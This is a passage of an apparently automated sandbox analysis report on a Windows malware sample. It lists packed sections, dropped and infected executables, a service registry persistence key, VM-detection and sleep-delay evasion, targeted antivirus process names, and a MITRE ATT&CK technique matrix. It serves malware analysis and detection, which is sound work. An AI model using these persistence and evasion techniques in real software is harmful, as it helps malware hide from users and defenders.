                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B2D9B push ecx; ret 1_2_000B2DAB
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B6014 push 000B14E1h; ret 1_2_000B6425
                  Source: LisectAVT_2403002B_48.exeStatic PE information: section name: .MPRESS1 entropy: 7.999833456794264
                  Source: LisectAVT_2403002B_48.exeStatic PE information: section name: Tu3 entropy: 6.934576836261578
                  Source: VSFdoO.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
                  Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934484616247345
                  Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934353058943832
                  Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.935177766542733
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SGuard.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeFile created: C:\Users\user\AppData\Local\Temp\VSFdoO.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SGuard.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeFile created: C:\Users\user\AppData\Roaming\winoshelper.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SGuard.exeJump to dropped file
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinOSHelperJump to behavior
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_004010DF

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SGuard.exeThread delayed: delay time: 7200000Jump to behavior
                  Source: C:\Windows\SGuard.exeWindow / User API: threadDelayed 1800Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\winoshelper.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1051
                  Source: C:\Windows\SGuard.exe TID: 7128Thread sleep count: 111 > 30Jump to behavior
                  Source: C:\Windows\SGuard.exe TID: 7128Thread sleep time: -13320000s >= -30000sJump to behavior
                  Source: C:\Windows\SGuard.exe TID: 7128Thread sleep count: 125 > 30Jump to behavior
                  Source: C:\Windows\SGuard.exe TID: 7128Thread sleep time: -900000000s >= -30000sJump to behavior
                  Source: C:\Windows\SGuard.exe TID: 5040Thread sleep count: 1800 > 30Jump to behavior
                  Source: C:\Windows\SGuard.exe TID: 5040Thread sleep time: -36000s >= -30000sJump to behavior
                  Source: C:\Windows\SGuard.exeLast function: Thread delayed
                  Source: C:\Windows\SGuard.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 000B1754h1_2_000B1718
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_10004333 FindFirstFileW,FindClose,0_2_10004333
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_000B29E2
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_000B2B8C
                  Source: C:\Windows\SGuard.exeThread delayed: delay time: 120000Jump to behavior
                  Source: C:\Windows\SGuard.exeThread delayed: delay time: 7200000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
                  Source: Amcache.hve.1.drBinary or memory string: VMware
                  Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: VSFdoO.exe, 00000001.00000002.2145793925.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000003.1696529803.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000003.1696529803.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000003.1696529803.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp, VSFdoO.exe, 00000001.00000002.2145793925.0000000000E47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.1.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.1.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeAPI call chain: ExitProcess graph end nodegraph_0-6433
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeAPI call chain: ExitProcess graph end nodegraph_0-5640
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeAPI call chain: ExitProcess graph end nodegraph_0-6430
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeAPI call chain: ExitProcess graph end nodegraph_0-6661
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeAPI call chain: ExitProcess graph end nodegraph_0-6511
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeAPI call chain: ExitProcess graph end nodegraph_0-6457
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeAPI call chain: ExitProcess graph end nodegraph_1-1025
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3FAAB LdrInitializeThunk,2_2_03C3FAAB
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004010DF LoadLibraryA,GetProcAddress,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_004010DF
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00531044 mov eax, dword ptr fs:[00000030h]0_2_00531044
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_100018E3 mov esi, dword ptr fs:[00000030h]0_2_100018E3
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_004021A0 GetProcessHeap,0_2_004021A0
                  Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6668 -ip 6668Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6668 -s 1640Jump to behavior
                  Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
                  Source: C:\Users\user\Desktop\LisectAVT_2403002B_48.exeCode function: 0_2_00403110 cpuid 0_2_00403110
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_000B1718
                  Source: C:\Users\user\AppData\Local\Temp\VSFdoO.exeCode function: 1_2_000B139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_000B139F
                  Source: LisectAVT_2403002B_48.exe, LisectAVT_2403002B_48.exe, 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: kxetray.exe
                  Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: LisectAVT_2403002B_48.exe, LisectAVT_2403002B_48.exe, 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 00000002.00000002.4147090865.0000000010113000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: 360tray.exe
                  Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: VSFdoO.exe PID: 6668, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: VSFdoO.exe PID: 6668, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  2
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Obfuscated Files or Information
                  11
                  Input Capture
                  11
                  System Time Discovery
                  1
                  Taint Shared Content
                  1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Service Execution
                  1
                  Valid Accounts
                  1
                  Valid Accounts
                  131
                  Software Packing
                  LSASS Memory4
                  File and Directory Discovery
                  Remote Desktop Protocol11
                  Input Capture
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt13
                  Windows Service
                  11
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  Security Account Manager13
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook13
                  Windows Service
                  121
                  Masquerading
                  NTDS21
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  1
                  Valid Accounts
                  LSA Secrets21
                  Virtualization/Sandbox Evasion
                  SSHKeylogging12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials3
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Access Token Manipulation
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Process Injection
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
